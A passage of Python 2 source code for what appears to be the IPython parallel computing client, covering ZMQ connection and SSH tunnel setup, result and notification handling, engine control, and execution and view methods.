# add newline for multiline reprs
text_out = '\n' + text_out
p.text(
out + u'Out[%i:%i]: ' % (
self.metadata['engine_id'], self.execution_count
) + normal + text_out
)
def _repr_html_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/html")
def _repr_latex_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/latex")
def _repr_json_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/json")
def _repr_javascript_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/javascript")
def _repr_png_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/png")
def _repr_jpeg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/jpeg")
def _repr_svg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/svg+xml")
class Metadata(dict):
"""Subclass of dict for initializing metadata values.
Attribute access works on keys.
These objects have a strict set of keys - errors will raise if you try
to add new keys.
"""
def __init__(self, *args, **kwargs):
dict.__init__(self)
md = {'msg_id' : None,
'submitted' : None,
'started' : None,
'completed' : None,
'received' : None,
'engine_uuid' : None,
'engine_id' : None,
'follow' : None,
'after' : None,
'status' : None,
'pyin' : None,
'pyout' : None,
'pyerr' : None,
'stdout' : '',
'stderr' : '',
'outputs' : [],
'data': {},
'outputs_ready' : False,
}
self.update(md)
self.update(dict(*args, **kwargs))
def __getattr__(self, key):
"""getattr aliased to getitem"""
if key in self.iterkeys():
return self[key]
else:
raise AttributeError(key)
def __setattr__(self, key, value):
"""setattr aliased to setitem, with strict"""
if key in self.iterkeys():
self[key] = value
else:
raise AttributeError(key)
def __setitem__(self, key, value):
"""strict static key enforcement"""
if key in self.iterkeys():
dict.__setitem__(self, key, value)
else:
raise KeyError(key)
class Client(HasTraits):
"""A semi-synchronous client to the IPython ZMQ cluster
Parameters
----------
url_file : str/unicode; path to ipcontroller-client.json
This JSON file should contain all the information needed to connect to a cluster,
and is likely the only argument needed.
Connection information for the Hub's registration. If a json connector
file is given, then likely no further configuration is necessary.
[Default: use profile]
profile : bytes
The name of the Cluster profile to be used to find connector information.
If run from an IPython application, the default profile will be the same
as the running application, otherwise it will be 'default'.
cluster_id : str
String id to added to runtime files, to prevent name collisions when using
multiple clusters with a single profile simultaneously.
When set, will look for files named like: 'ipcontroller-<cluster_id>-client.json'
Since this is text inserted into filenames, typical recommendations apply:
Simple character strings are ideal, and spaces are not recommended (but
should generally work)
context : zmq.Context
Pass an existing zmq.Context instance, otherwise the client will create its own.
debug : bool
flag for lots of message printing for debug purposes
timeout : int/float
time (in seconds) to wait for connection replies from the Hub
[Default: 10]
#-------------- session related args ----------------
config : Config object
If specified, this will be relayed to the Session for configuration
username : str
set username for the session object
#-------------- ssh related args ----------------
# These are args for configuring the ssh tunnel to be used
# credentials are used to forward connections over ssh to the Controller
# Note that the ip given in `addr` needs to be relative to sshserver
# The most basic case is to leave addr as pointing to localhost (127.0.0.1),
# and set sshserver as the same machine the Controller is on. However,
# the only requirement is that sshserver is able to see the Controller
# (i.e. is within the same trusted network).
sshserver : str
A string of the form passed to ssh, i.e. 'server.tld' or 'user@server.tld:port'
If keyfile or password is specified, and this is not, it will default to
the ip given in addr.
sshkey : str; path to ssh private key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str
Your ssh password to sshserver. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
paramiko : bool
flag for whether to use paramiko instead of shell ssh for tunneling.
[default: True on win32, False else]
Attributes
----------
ids : list of int engine IDs
requesting the ids attribute always synchronizes
the registration state. To request ids without synchronization,
use semi-private _ids attributes.
history : list of msg_ids
a list of msg_ids, keeping track of all the execution
messages you have submitted in order.
outstanding : set of msg_ids
a set of msg_ids that have been submitted, but whose
results have not yet been received.
results : dict
a dict of all our results, keyed by msg_id
block : bool
determines default behavior when block not specified
in execution methods
Methods
-------
spin
flushes incoming results and registration state changes
control methods spin, and requesting `ids` also ensures up to date
wait
wait on one or more msg_ids
execution methods
apply
legacy: execute, run
data movement
push, pull, scatter, gather
query methods
queue_status, get_result, purge, result_status
control methods
abort, shutdown
"""
block = Bool(False)
outstanding = Set()
results = Instance('collections.defaultdict', (dict,))
metadata = Instance('collections.defaultdict', (Metadata,))
history = List()
debug = Bool(False)
_spin_thread = Any()
_stop_spinning = Any()
profile=Unicode()
def _profile_default(self):
if BaseIPythonApplication.initialized():
# an IPython app *might* be running, try to get its profile
try:
return BaseIPythonApplication.instance().profile
except (AttributeError, MultipleInstanceError):
# could be a *different* subclass of config.Application,
# which would raise one of these two errors.
return u'default'
else:
return u'default'
_outstanding_dict = Instance('collections.defaultdict', (set,))
_ids = List()
_connected=Bool(False)
_ssh=Bool(False)
_context = Instance('zmq.Context')
_config = Dict()
_engines=Instance(util.ReverseDict, (), {})
# _hub_socket=Instance('zmq.Socket')
_query_socket=Instance('zmq.Socket')
_control_socket=Instance('zmq.Socket')
_iopub_socket=Instance('zmq.Socket')
_notification_socket=Instance('zmq.Socket')
_mux_socket=Instance('zmq.Socket')
_task_socket=Instance('zmq.Socket')
_task_scheme=Unicode()
_closed = False
_ignored_control_replies=Integer(0)
_ignored_hub_replies=Integer(0)
def __new__(self, *args, **kw):
# don't raise on positional args
return HasTraits.__new__(self, **kw)
def __init__(self, url_file=None, profile=None, profile_dir=None, ipython_dir=None,
context=None, debug=False,
sshserver=None, sshkey=None, password=None, paramiko=None,
timeout=10, cluster_id=None, **extra_args
):
if profile:
super(Client, self).__init__(debug=debug, profile=profile)
else:
super(Client, self).__init__(debug=debug)
if context is None:
context = zmq.Context.instance()
self._context = context
self._stop_spinning = Event()
if 'url_or_file' in extra_args:
url_file = extra_args['url_or_file']
warnings.warn("url_or_file arg no longer supported, use url_file", DeprecationWarning)
if url_file and util.is_url(url_file):
raise ValueError("single urls cannot be specified, url-files must be used.")
self._setup_profile_dir(self.profile, profile_dir, ipython_dir)
if self._cd is not None:
if url_file is None:
if not cluster_id:
client_json = 'ipcontroller-client.json'
else:
client_json = 'ipcontroller-%s-client.json' % cluster_id
url_file = pjoin(self._cd.security_dir, client_json)
if url_file is None:
raise ValueError(
"I can't find enough information to connect to a hub!"
" Please specify at least one of url_file or profile."
)
with open(url_file) as f:
cfg = json.load(f)
self._task_scheme = cfg['task_scheme']
# sync defaults from args, json:
if sshserver:
cfg['ssh'] = sshserver
location = cfg.setdefault('location', None)
proto,addr = cfg['interface'].split('://')
addr = util.disambiguate_ip_address(addr, location)
cfg['interface'] = "%s://%s" % (proto, addr)
# turn interface,port into full urls:
for key in ('control', 'task', 'mux', 'iopub', 'notification', 'registration'):
cfg[key] = cfg['interface'] + ':%i' % cfg[key]
url = cfg['registration']
if location is not None and addr == LOCALHOST:
# location specified, and connection is expected to be local
if location not in LOCAL_IPS and not sshserver:
# load ssh from JSON *only* if the controller is not on
# this machine
sshserver=cfg['ssh']
if location not in LOCAL_IPS and not sshserver:
# warn if no ssh specified, but SSH is probably needed
# This is only a warning, because the most likely cause
# is a local Controller on a laptop whose IP is dynamic
warnings.warn("""
Controller appears to be listening on localhost, but not on this machine.
If this is true, you should specify Client(...,sshserver='you@%s')
or instruct your controller to listen on an external IP."""%location,
RuntimeWarning)
elif not sshserver:
# otherwise sync with cfg
sshserver = cfg['ssh']
self._config = cfg
self._ssh = bool(sshserver or sshkey or password)
if self._ssh and sshserver is None:
# default to ssh via localhost
sshserver = addr
if self._ssh and password is None:
if tunnel.try_passwordless_ssh(sshserver, sshkey, paramiko):
password=False
else:
password = getpass("SSH Password for %s: "%sshserver)
ssh_kwargs = dict(keyfile=sshkey, password=password, paramiko=paramiko)
# configure and construct the session
try:
extra_args['packer'] = cfg['pack']
extra_args['unpacker'] = cfg['unpack']
extra_args['key'] = cast_bytes(cfg['key'])
extra_args['signature_scheme'] = cfg['signature_scheme']
except KeyError as exc:
msg = '\n'.join([
"Connection file is invalid (missing '{}'), possibly from an old version of IPython.",
"If you are reusing connection files, remove them and start ipcontroller again."
])
raise ValueError(msg.format(exc.message))
self.session = Session(**extra_args)
self._query_socket = self._context.socket(zmq.DEALER)
if self._ssh:
tunnel.tunnel_connection(self._query_socket, cfg['registration'], sshserver, **ssh_kwargs)
else:
self._query_socket.connect(cfg['registration'])
self.session.debug = self.debug
self._notification_handlers = {'registration_notification' : self._register_engine,
'unregistration_notification' : self._unregister_engine,
'shutdown_notification' : lambda msg: self.close(),
}
self._queue_handlers = {'execute_reply' : self._handle_execute_reply,
'apply_reply' : self._handle_apply_reply}
try:
self._connect(sshserver, ssh_kwargs, timeout)
except:
self.close(linger=0)
raise
# last step: setup magics, if we are in IPython:
try:
ip = get_ipython()
except NameError:
return
else:
if 'px' not in ip.magics_manager.magics:
# in IPython but we are the first Client.
# activate a default view for parallel magics.
self.activate()
def __del__(self):
"""cleanup sockets, but _not_ context."""
self.close()
def _setup_profile_dir(self, profile, profile_dir, ipython_dir):
if ipython_dir is None:
ipython_dir = get_ipython_dir()
if profile_dir is not None:
try:
self._cd = ProfileDir.find_profile_dir(profile_dir)
return
except ProfileDirError:
pass
elif profile is not None:
try:
self._cd = ProfileDir.find_profile_dir_by_name(
ipython_dir, profile)
return
except ProfileDirError:
pass
self._cd = None
def _update_engines(self, engines):
"""Update our engines dict and _ids from a dict of the form: {id:uuid}."""
for k,v in engines.iteritems():
eid = int(k)
if eid not in self._engines:
self._ids.append(eid)
self._engines[eid] = v
self._ids = sorted(self._ids)
if sorted(self._engines.keys()) != range(len(self._engines)) and \
self._task_scheme == 'pure' and self._task_socket:
self._stop_scheduling_tasks()
def _stop_scheduling_tasks(self):
"""Stop scheduling tasks because an engine has been unregistered
from a pure ZMQ scheduler.
"""
self._task_socket.close()
self._task_socket = None
msg = "An engine has been unregistered, and we are using pure " +\
"ZMQ task scheduling. Task farming will be disabled."
if self.outstanding:
msg += " If you were running tasks when this happened, " +\
"some `outstanding` msg_ids may never resolve."
warnings.warn(msg, RuntimeWarning)
def _build_targets(self, targets):
"""Turn valid target IDs or 'all' into two lists:
(int_ids, uuids).
"""
if not self._ids:
# flush notification socket if no engines yet, just in case
if not self.ids:
raise error.NoEnginesRegistered("Can't build targets without any engines")
if targets is None:
targets = self._ids
elif isinstance(targets, basestring):
if targets.lower() == 'all':
targets = self._ids
else:
raise TypeError("%r not valid str target, must be 'all'"%(targets))
elif isinstance(targets, int):
if targets < 0:
targets = self.ids[targets]
if targets not in self._ids:
raise IndexError("No such engine: %i"%targets)
targets = [targets]
if isinstance(targets, slice):
indices = range(len(self._ids))[targets]
ids = self.ids
targets = [ ids[i] for i in indices ]
if not isinstance(targets, (tuple, list, xrange)):
raise TypeError("targets by int/slice/collection of ints only, not %s"%(type(targets)))
return [cast_bytes(self._engines[t]) for t in targets], list(targets)
def _connect(self, sshserver, ssh_kwargs, timeout):
"""setup all our socket connections to the cluster. This is called from
__init__."""
# Maybe allow reconnecting?
if self._connected:
return
self._connected=True
def connect_socket(s, url):
if self._ssh:
return tunnel.tunnel_connection(s, url, sshserver, **ssh_kwargs)
else:
return s.connect(url)
self.session.send(self._query_socket, 'connection_request')
# use Poller because zmq.select has wrong units in pyzmq 2.1.7
poller = zmq.Poller()
poller.register(self._query_socket, zmq.POLLIN)
# poll expects milliseconds, timeout is seconds
evts = poller.poll(timeout*1000)
if not evts:
raise error.TimeoutError("Hub connection request timed out")
idents,msg = self.session.recv(self._query_socket,mode=0)
if self.debug:
pprint(msg)
content = msg['content']
# self._config['registration'] = dict(content)
cfg = self._config
if content['status'] == 'ok':
self._mux_socket = self._context.socket(zmq.DEALER)
connect_socket(self._mux_socket, cfg['mux'])
self._task_socket = self._context.socket(zmq.DEALER)
connect_socket(self._task_socket, cfg['task'])
self._notification_socket = self._context.socket(zmq.SUB)
self._notification_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._notification_socket, cfg['notification'])
self._control_socket = self._context.socket(zmq.DEALER)
connect_socket(self._control_socket, cfg['control'])
self._iopub_socket = self._context.socket(zmq.SUB)
self._iopub_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._iopub_socket, cfg['iopub'])
self._update_engines(dict(content['engines']))
else:
self._connected = False
raise Exception("Failed to connect!")
#--------------------------------------------------------------------------
# handlers and callbacks for incoming messages
#--------------------------------------------------------------------------
def _unwrap_exception(self, content):
"""unwrap exception, and remap engine_id to int."""
e = error.unwrap_exception(content)
# print e.traceback
if e.engine_info:
e_uuid = e.engine_info['engine_uuid']
eid = self._engines[e_uuid]
e.engine_info['engine_id'] = eid
return e
def _extract_metadata(self, msg):
header = msg['header']
parent = msg['parent_header']
msg_meta = msg['metadata']
content = msg['content']
md = {'msg_id' : parent['msg_id'],
'received' : datetime.now(),
'engine_uuid' : msg_meta.get('engine', None),
'follow' : msg_meta.get('follow', []),
'after' : msg_meta.get('after', []),
'status' : content['status'],
}
if md['engine_uuid'] is not None:
md['engine_id'] = self._engines.get(md['engine_uuid'], None)
if 'date' in parent:
md['submitted'] = parent['date']
if 'started' in msg_meta:
md['started'] = msg_meta['started']
if 'date' in header:
md['completed'] = header['date']
return md
def _register_engine(self, msg):
"""Register a new engine, and update our connection info."""
content = msg['content']
eid = content['id']
d = {eid : content['uuid']}
self._update_engines(d)
def _unregister_engine(self, msg):
"""Unregister an engine that has died."""
content = msg['content']
eid = int(content['id'])
if eid in self._ids:
self._ids.remove(eid)
uuid = self._engines.pop(eid)
self._handle_stranded_msgs(eid, uuid)
if self._task_socket and self._task_scheme == 'pure':
self._stop_scheduling_tasks()
def _handle_stranded_msgs(self, eid, uuid):
"""Handle messages known to be on an engine when the engine unregisters.
It is possible that this will fire prematurely - that is, an engine will
go down after completing a result, and the client will be notified
of the unregistration and later receive the successful result.
"""
outstanding = self._outstanding_dict[uuid]
for msg_id in list(outstanding):
if msg_id in self.results:
# we already
continue
try:
raise error.EngineError("Engine %r died while running task %r"%(eid, msg_id))
except:
content = error.wrap_exception()
# build a fake message:
msg = self.session.msg('apply_reply', content=content)
msg['parent_header']['msg_id'] = msg_id
msg['metadata']['engine'] = uuid
self._handle_apply_reply(msg)
def _handle_execute_reply(self, msg):
"""Save the reply to an execute_request into our results.
execute messages are never actually used. apply is used instead.
"""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print ("got stale result: %s"%msg_id)
else:
print ("got unknown result: %s"%msg_id)
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = ExecuteReply(msg_id, content, md)
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _handle_apply_reply(self, msg):
"""Save the reply to an apply_request into our results."""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print ("got stale result: %s"%msg_id)
print self.results[msg_id]
print msg
else:
print ("got unknown result: %s"%msg_id)
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = serialize.unserialize_object(msg['buffers'])[0]
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _flush_notifications(self):
"""Flush notifications of engine registrations waiting
in ZMQ queue."""
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._notification_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
def _flush_results(self, sock):
"""Flush task or queue results waiting in ZMQ queue."""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._queue_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_control(self, sock):
"""Flush replies from the control channel waiting
in the ZMQ queue.
Currently: ignore them."""
if self._ignored_control_replies <= 0:
return
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
self._ignored_control_replies -= 1
if self.debug:
pprint(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_ignored_control(self):
"""flush ignored control replies"""
while self._ignored_control_replies > 0:
self.session.recv(self._control_socket)
self._ignored_control_replies -= 1
def _flush_ignored_hub_replies(self):
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
while msg is not None:
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
def _flush_iopub(self, sock):
"""Flush replies from the iopub channel waiting
in the ZMQ queue.
"""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
parent = msg['parent_header']
# ignore IOPub messages with no parent.
# Caused by print statements or warnings from before the first execution.
if not parent:
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
continue
msg_id = parent['msg_id']
content = msg['content']
header = msg['header']
msg_type = msg['header']['msg_type']
# init metadata:
md = self.metadata[msg_id]
if msg_type == 'stream':
name = content['name']
s = md[name] or ''
md[name] = s + content['data']
elif msg_type == 'pyerr':
md.update({'pyerr' : self._unwrap_exception(content)})
elif msg_type == 'pyin':
md.update({'pyin' : content['code']})
elif msg_type == 'display_data':
md['outputs'].append(content)
elif msg_type == 'pyout':
md['pyout'] = content
elif msg_type == 'data_message':
data, remainder = serialize.unserialize_object(msg['buffers'])
md['data'].update(data)
elif msg_type == 'status':
# idle message comes after all outputs
if content['execution_state'] == 'idle':
md['outputs_ready'] = True
else:
# unhandled msg_type (status, etc.)
pass
# reduntant?
self.metadata[msg_id] = md
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
#--------------------------------------------------------------------------
# len, getitem
#--------------------------------------------------------------------------
def __len__(self):
"""len(client) returns # of engines."""
return len(self.ids)
def __getitem__(self, key):
"""index access returns DirectView multiplexer objects
Must be int, slice, or list/tuple/xrange of ints"""
if not isinstance(key, (int, slice, tuple, list, xrange)):
raise TypeError("key by int/slice/iterable of ints only, not %s"%(type(key)))
else:
return self.direct_view(key)
#--------------------------------------------------------------------------
# Begin public methods
#--------------------------------------------------------------------------
@property
def ids(self):
"""Always up-to-date ids property."""
self._flush_notifications()
# always copy:
return list(self._ids)
def activate(self, targets='all', suffix=''):
"""Create a DirectView and register it with IPython magics
Defines the magics `%px, %autopx, %pxresult, %%px`
Parameters
----------
targets: int, list of ints, or 'all'
The engines on which the view's magics will run
suffix: str [default: '']
The suffix, if any, for the magics. This allows you to have
multiple views associated with parallel magics at the same time.
e.g. ``rc.activate(targets=0, suffix='0')`` will give you
the magics ``%px0``, ``%pxresult0``, etc. for running magics just
on engine 0.
"""
view = self.direct_view(targets)
view.block = True
view.activate(suffix)
return view
def close(self, linger=None):
"""Close my zmq Sockets
If `linger`, set the zmq LINGER socket option,
which allows discarding of messages.
"""
if self._closed:
return
self.stop_spin_thread()
snames = [ trait for trait in self.trait_names() if trait.endswith("socket") ]
for name in snames:
socket = getattr(self, name)
if socket is not None and not socket.closed:
if linger is not None:
socket.close(linger=linger)
else:
socket.close()
self._closed = True
def _spin_every(self, interval=1):
"""target func for use in spin_thread"""
while True:
if self._stop_spinning.is_set():
return
time.sleep(interval)
self.spin()
def spin_thread(self, interval=1):
"""call Client.spin() in a background thread on some regular interval
This helps ensure that messages don't pile up too much in the zmq queue
while you are working on other things, or just leaving an idle terminal.
It also helps limit potential padding of the `received` timestamp
on AsyncResult objects, used for timings.
Parameters
----------
interval : float, optional
The interval on which to spin the client in the background thread
(simply passed to time.sleep).
Notes
-----
For precision timing, you may want to use this method to put a bound
on the jitter (in seconds) in `received` timestamps used
in AsyncResult.wall_time.
"""
if self._spin_thread is not None:
self.stop_spin_thread()
self._stop_spinning.clear()
self._spin_thread = Thread(target=self._spin_every, args=(interval,))
self._spin_thread.daemon = True
self._spin_thread.start()
def stop_spin_thread(self):
"""stop background spin_thread, if any"""
if self._spin_thread is not None:
self._stop_spinning.set()
self._spin_thread.join()
self._spin_thread = None
def spin(self):
"""Flush any registration notifications and execution results
waiting in the ZMQ queue.
"""
if self._notification_socket:
self._flush_notifications()
if self._iopub_socket:
self._flush_iopub(self._iopub_socket)
if self._mux_socket:
self._flush_results(self._mux_socket)
if self._task_socket:
self._flush_results(self._task_socket)
if self._control_socket:
self._flush_control(self._control_socket)
if self._query_socket:
self._flush_ignored_hub_replies()
def wait(self, jobs=None, timeout=-1):
"""waits on one or more `jobs`, for up to `timeout` seconds.
Parameters
----------
jobs : int, str, or list of ints and/or strs, or one or more AsyncResult objects
ints are indices to self.history
strs are msg_ids
default: wait on all outstanding messages
timeout : float
a time in seconds, after which to give up.
default is -1, which means no timeout
Returns
-------
True : when all msg_ids are done
False : timeout reached, some msg_ids still outstanding
"""
tic = time.time()
if jobs is None:
theids = self.outstanding
else:
if isinstance(jobs, (int, basestring, AsyncResult)):
jobs = [jobs]
theids = set()
for job in jobs:
if isinstance(job, int):
# index access
job = self.history[job]
elif isinstance(job, AsyncResult):
map(theids.add, job.msg_ids)
continue
theids.add(job)
if not theids.intersection(self.outstanding):
return True
self.spin()
while theids.intersection(self.outstanding):
if timeout >= 0 and ( time.time()-tic ) > timeout:
break
time.sleep(1e-3)
self.spin()
return len(theids.intersection(self.outstanding)) == 0
#--------------------------------------------------------------------------
# Control methods
#--------------------------------------------------------------------------
@spin_first
def clear(self, targets=None, block=None):
"""Clear the namespace in target(s)."""
block = self.block if block is None else block
targets = self._build_targets(targets)[0]
for t in targets:
self.session.send(self._control_socket, 'clear_request', content={}, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def abort(self, jobs=None, targets=None, block=None):
"""Abort specific jobs from the execution queues of target(s).
This is a mechanism to prevent jobs that have already been submitted
from executing.
Parameters
----------
jobs : msg_id, list of msg_ids, or AsyncResult
The jobs to be aborted
If unspecified/None: abort all outstanding jobs.
"""
block = self.block if block is None else block
jobs = jobs if jobs is not None else list(self.outstanding)
targets = self._build_targets(targets)[0]
msg_ids = []
if isinstance(jobs, (basestring,AsyncResult)):
jobs = [jobs]
bad_ids = filter(lambda obj: not isinstance(obj, (basestring, AsyncResult)), jobs)
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
content = dict(msg_ids=msg_ids)
for t in targets:
self.session.send(self._control_socket, 'abort_request',
content=content, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def shutdown(self, targets='all', restart=False, hub=False, block=None):
"""Terminates one or more engine processes, optionally including the hub.
Parameters
----------
targets: list of ints or 'all' [default: all]
Which engines to shutdown.
hub: bool [default: False]
Whether to include the Hub. hub=True implies targets='all'.
block: bool [default: self.block]
Whether to wait for clean shutdown replies or not.
restart: bool [default: False]
NOT IMPLEMENTED
whether to restart engines after shutting them down.
"""
from IPython.parallel.error import NoEnginesRegistered
if restart:
raise NotImplementedError("Engine restart is not yet implemented")
block = self.block if block is None else block
if hub:
targets = 'all'
try:
targets = self._build_targets(targets)[0]
except NoEnginesRegistered:
targets = []
for t in targets:
self.session.send(self._control_socket, 'shutdown_request',
content={'restart':restart},ident=t)
error = False
if block or hub:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if hub:
time.sleep(0.25)
self.session.send(self._query_socket, 'shutdown_request')
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
if error:
raise error
#--------------------------------------------------------------------------
# Execution related methods
#--------------------------------------------------------------------------
def _maybe_raise(self, result):
"""wrapper for maybe raising an exception if apply failed."""
if isinstance(result, error.RemoteError):
raise result
return result
def send_apply_request(self, socket, f, args=None, kwargs=None, metadata=None, track=False,
ident=None):
"""construct and send an apply message via a socket.
This is the principal method with which all engine execution is performed by views.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
args = args if args is not None else []
kwargs = kwargs if kwargs is not None else {}
metadata = metadata if metadata is not None else {}
# validate arguments
if not callable(f) and not isinstance(f, Reference):
raise TypeError("f must be callable, not %s"%type(f))
if not isinstance(args, (tuple, list)):
raise TypeError("args must be tuple or list, not %s"%type(args))
if not isinstance(kwargs, dict):
raise TypeError("kwargs must be dict, not %s"%type(kwargs))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s"%type(metadata))
bufs = serialize.pack_apply_message(f, args, kwargs,
buffer_threshold=self.session.buffer_threshold,
item_threshold=self.session.item_threshold,
)
msg = self.session.send(socket, "apply_request", buffers=bufs, ident=ident,
metadata=metadata, track=track)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in self._engines.values():
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
def send_execute_request(self, socket, code, silent=True, metadata=None, ident=None):
"""construct and send an execute request via a socket.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(code, basestring):
raise TypeError("code must be text, not %s" % type(code))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s" % type(metadata))
content = dict(code=code, silent=bool(silent), user_variables=[], user_expressions={})
msg = self.session.send(socket, "execute_request", content=content, ident=ident,
metadata=metadata)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in self._engines.values():
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
#--------------------------------------------------------------------------
# construct a View object
#--------------------------------------------------------------------------
def load_balanced_view(self, targets=None):
"""construct a DirectView object.
If no arguments are specified, create a LoadBalancedView
using all engines.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The subset of engines across which to load-balance
"""
if targets == 'all':
targets = None
if targets is not None:
targets = self._build_targets(targets)[1]
return LoadBalancedView(client=self, socket=self._task_socket, targets=targets)
def direct_view(self, targets='all'):
"""construct a DirectView object.
If no targets are specified, create a DirectView using all engines.
rc.direct_view('all') is distinguished from rc[:] in that 'all' will
evaluate the target engines at each execution, whereas rc[:] will connect to
all *current* engines, and that list will not change.
That is, 'all' will always use all engines, whereas rc[:] will not use
engines added after the DirectView is constructed.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The engines to use for the View
"""
single = isinstance(targets, int)
# allow 'all' to be lazily evaluated at each execution
if targets != 'all':
targets = self._build_targets(targets)[1]
if single:
targets = targets[0]
return DirectView(client=self, socket=self._mux_socket, targets=targets)
#--------------------------------------------------------------------------
# Query methods
#--------------------------------------------------------------------------
@spin_first
def get_result(self, indices_or_msg_ids=None, block=None):
"""Retrieve a result by msg_id or history index, wrapped in an AsyncResult object.
If the client already has the results, no request to the Hub will be made.
This is a convenient way to construct AsyncResult objects, which are wrappers
that include metadata about execution, and allow for awaiting results that
were not submitted by this Client.
It can also be a convenient way to retrieve the metadata associated with
blocking execution, since it always retrieves
Examples
--------
::
In [10]: r = client.apply()
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncResult
A single AsyncResult object will always be returned.
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
single_result = False
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
single_result = True
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, basestring):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
local_ids = filter(lambda msg_id: msg_id in self.outstanding or msg_id in self.results, theids)
remote_ids = filter(lambda msg_id: msg_id not in local_ids, theids)
# given single msg_id initially, get_result shot get the result itself,
